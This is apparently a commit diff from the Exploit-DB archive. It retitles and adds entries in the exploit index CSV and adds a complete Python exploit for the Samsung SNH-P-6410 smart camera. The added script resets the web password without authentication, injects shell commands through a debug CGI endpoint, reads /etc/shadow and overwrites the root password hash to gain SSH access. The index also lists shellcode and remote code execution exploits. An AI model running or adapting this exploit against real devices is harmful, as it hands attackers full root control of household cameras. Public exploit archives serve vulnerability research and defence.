31691,platforms/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include",2014-02-16,Vulnerability-Lab,ios,webapps,8080
|
||||
31692,platforms/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080
|
||||
|
|
@ -29000,7 +29000,7 @@ id,file,description,date,author,platform,type,port
|
|||
32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80
|
||||
32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x (upload.php filename param) - Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80
|
||||
32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,Metasploit,windows,remote,30000
|
||||
32164,platforms/windows/remote/32164.rb,"HP Data Protector Backup Client Service Remote Code Execution",2014-03-10,Metasploit,windows,remote,5555
|
||||
32164,platforms/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution",2014-03-10,Metasploit,windows,remote,5555
|
||||
32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0
|
||||
32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - iart.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0
|
||||
32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 Host Header Internet Filter Security Bypass",2008-08-05,nnposter,multiple,remote,0
|
||||
|
|
@ -30104,7 +30104,7 @@ id,file,description,date,author,platform,type,port
|
|||
33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0
|
||||
33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0
|
||||
33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0
|
||||
33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x graph.php Multiple Parameter XSS",2009-11-21,"Moritz Naumann",php,webapps,0
|
||||
33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x - graph.php Multiple Parameter XSS",2009-11-21,"Moritz Naumann",php,webapps,0
|
||||
33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 Delete Function Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0
|
||||
33376,platforms/php/webapps/33376.pl,"klinza professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,php,webapps,0
|
||||
33377,platforms/php/webapps/33377.txt,"Joomla! ProofReader 1.0 RC9 Component Cross-Site Scripting",2009-11-16,MustLive,php,webapps,0
|
||||
|
|
@ -30264,7 +30264,7 @@ id,file,description,date,author,platform,type,port
|
|||
33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 SQL Injection",2010-01-22,AndySoon,php,webapps,0
|
||||
33562,platforms/multiple/remote/33562.html,"Google Chrome 3.0 Style Sheet Redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",multiple,remote,0
|
||||
33563,platforms/windows/remote/33563.txt,"Apple Safari 4.0.4 Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",windows,remote,0
|
||||
33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0
|
||||
33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0
|
||||
33565,platforms/php/webapps/33565.txt,"PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting",2010-01-24,s4r4d0,php,webapps,0
|
||||
33566,platforms/php/webapps/33566.txt,"Joomla! 3D Cloud 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0
|
||||
33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",hardware,remote,0
|
||||
|
|
@ -31080,7 +31080,7 @@ id,file,description,date,author,platform,type,port
|
|||
34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
|
||||
34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",windows,dos,0
|
||||
34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0
|
||||
34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0
|
||||
34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (Red Hat High Performance Computing - HPC) - utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0
|
||||
34505,platforms/php/dos/34505.txt,"MySQL 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service",2010-08-19,"Boris Reisig",php,dos,0
|
||||
34506,platforms/linux/dos/34506.txt,"MySQL 5.1.48 - 'EXPLAIN' Denial Of Service",2010-08-20,"Bjorn Munch",linux,dos,0
|
||||
34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0
|
||||
|
|
@ -31553,7 +31553,7 @@ id,file,description,date,author,platform,type,port
|
|||
35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,Metasploit,windows,remote,0
|
||||
35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps,0
|
||||
35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,Metasploit,php,remote,80
|
||||
35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,Metasploit,multiple,remote,5555
|
||||
35034,platforms/multiple/remote/35034.rb,"HP Data Protector - EXEC_INTEGUTIL Remote Code Execution",2014-10-21,Metasploit,multiple,remote,5555
|
||||
35035,platforms/cgi/webapps/35035.txt,"Awstats 6.x Apache Tomcat Configuration File Remote Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0
|
||||
35036,platforms/php/webapps/35036.txt,"Annuaire Component for Joomla! - 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0
|
||||
35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000
|
||||
|
|
@ -32733,7 +32733,7 @@ id,file,description,date,author,platform,type,port
|
|||
36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 Plugin - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
|
||||
36302,platforms/php/webapps/36302.txt,"Joomla Content Component - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
|
||||
36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80
|
||||
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555
|
||||
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555
|
||||
36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
|
||||
36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0
|
||||
36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0
|
||||
|
|
@ -34755,7 +34755,7 @@ id,file,description,date,author,platform,type,port
|
|||
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
|
||||
38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
|
||||
38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
|
||||
38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
|
||||
38472,platforms/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
|
||||
38473,platforms/linux/local/38473.py,"Linux 3.17 - noexec File Permission Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0
|
||||
38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
|
||||
38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0
|
||||
|
|
@ -36173,7 +36173,7 @@ id,file,description,date,author,platform,type,port
|
|||
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
|
||||
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443
|
||||
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
40054,platforms/linux/local/40054.c,"Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation",2016-07-04,halfdog,linux,local,0
|
||||
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Local Privilege Escalation",2016-07-04,halfdog,linux,local,0
|
||||
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
|
||||
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
|
||||
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
|
||||
|
|
@ -36345,11 +36345,11 @@ id,file,description,date,author,platform,type,port
|
|||
40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) CSRF",2016-08-01,"Yorick Koster",php,webapps,80
|
||||
40192,platforms/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC",2016-08-01,"Karn Ganeshen",windows,dos,0
|
||||
40194,platforms/multiple/dos/40194.txt,"Wireshark 1.12.0-1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
|
||||
40195,platforms/multiple/dos/40195.txt,"Wireshark 2.0.0 - 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
|
||||
40196,platforms/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 - 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,win_x86-64,dos,0
|
||||
40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
|
||||
40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
|
||||
40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
|
||||
40195,platforms/multiple/dos/40195.txt,"Wireshark 2.0.0 < 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
|
||||
40196,platforms/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 < 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,win_x86-64,dos,0
|
||||
40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
|
||||
40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
|
||||
40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
|
||||
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
|
||||
40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
|
||||
40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
|
||||
|
|
@ -36381,6 +36381,7 @@ id,file,description,date,author,platform,type,port
|
|||
40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0
|
||||
40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0
|
||||
40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80
|
||||
40232,platforms/linux/webapps/40232.py,"FreePBX 13 / 14 - Remote Code Execution",2016-08-12,pgt,linux,webapps,0
|
||||
40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation",2016-08-12,pgt,linux,remote,0
|
||||
40233,platforms/php/remote/40233.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2)",2013-11-01,noptrix,php,remote,0
|
||||
40234,platforms/windows/remote/40234.py,"Easy FTP Server - _APPE_ Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
|
||||
40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
|
||||
40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
64
platforms/hardware/remote/40235.py
Executable file
64
platforms/hardware/remote/40235.py
Executable file
|
|
@ -0,0 +1,64 @@
|
|||
# E-DB Note: source ~ https://www.pentestpartners.com/blog/samsungs-smart-camera-a-tale-of-iot-network-security/
|
||||
|
||||
import urllib, urllib2, crypt, time
|
||||
|
||||
# New password for web interface
|
||||
web_password = 'admin'
|
||||
# New password for root
|
||||
root_password = 'root'
|
||||
# IP of the camera
|
||||
ip = '192.168.12.61'
|
||||
|
||||
# These are all for the Smartthings bundled camera
|
||||
realm = 'iPolis'
|
||||
web_username = 'admin'
|
||||
base_url = 'http://' + ip + '/cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/...;'
|
||||
|
||||
|
||||
# Take a command and use command injection to run it on the device
|
||||
def run_command(command):
|
||||
# Convert a normal command into one using bash brace expansion
|
||||
# Can't send spaces to debugcgi as it doesn't unescape
|
||||
command_brace = '{' + ','.join(command.split(' ')) + '}'
|
||||
command_url = base_url + command_brace
|
||||
|
||||
# HTTP digest auth for urllib2
|
||||
authhandler = urllib2.HTTPDigestAuthHandler()
|
||||
authhandler.add_password(realm, command_url, web_username, web_password)
|
||||
opener = urllib2.build_opener(authhandler)
|
||||
urllib2.install_opener(opener)
|
||||
|
||||
return urllib2.urlopen(command_url)
|
||||
|
||||
# Step 1 - change the web password using the unauthed vuln found by zenofex
|
||||
data = urllib.urlencode({ 'data' : 'NEW;' + web_password })
|
||||
urllib2.urlopen('http://' + ip + '/classes/class_admin_privatekey.php', data)
|
||||
|
||||
# Need to sleep or the password isn't changed
|
||||
time.sleep(1)
|
||||
|
||||
# Step 2 - find the current root password hash
|
||||
shadow = run_command('cat /etc/shadow')
|
||||
|
||||
for line in shadow:
|
||||
if line.startswith('root:'):
|
||||
current_hash = line.split(':')[1]
|
||||
|
||||
# Crypt the new password
|
||||
new_hash = crypt.crypt(root_password, '00')
|
||||
|
||||
# Step 3 - Use sed to search and replace the old for new hash in the passwd
|
||||
# This is done because the command injection doesn't allow a lot of different URL encoded chars
|
||||
run_command('sed -i -e s/' + current_hash + '/' + new_hash + '/g /etc/shadow')
|
||||
|
||||
# Step 4 - check that the password has changed
|
||||
shadow = run_command('cat /etc/shadow')
|
||||
|
||||
for line in shadow:
|
||||
if line.startswith('root:'):
|
||||
current_hash = line.split(':')[1]
|
||||
|
||||
if current_hash <> new_hash:
|
||||
print 'Error! - password not changed'
|
||||
|
||||
# Step 5 - ssh to port 1022 with new root password!
|
||||
Loading…
Add table
Reference in a new issue